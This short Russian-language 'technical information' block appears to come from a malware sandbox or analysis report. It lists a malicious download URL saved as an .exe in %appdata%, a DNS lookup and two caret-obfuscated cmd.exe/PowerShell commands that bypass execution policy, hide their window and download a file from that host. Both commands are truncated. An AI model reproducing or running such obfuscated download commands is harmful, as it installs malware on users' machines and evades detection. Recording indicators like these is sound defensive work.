Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOwe^Rs^hE^L^L^.^exE^ -EXecU^tIOn^P^O^L^I^CY ^B^yP^a^Ss ^-^n^O^P^RofiLe^ ^-w^in^doWStYlE hiDDE^N (NE^W-oB^j^ecT^ syStE^M.N^Et.W^eB^CLient).D^owNl^O^ad^fiLE(^'http://newye...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "pOwe^Rs^hE^L^L^.^exE^ -EXecU^tIOn^P^O^L^I^CY ^B^yP^a^Ss ^-^n^O^P^RofiLe^ ^-w^in^doWStYlE hiDDE^N (NE^W-oB^j^ecT^ syStE^M.N^Et.W^eB^CLient).D^owNl^O^ad^fiLE(^'http://newye...' (со скрытым окном)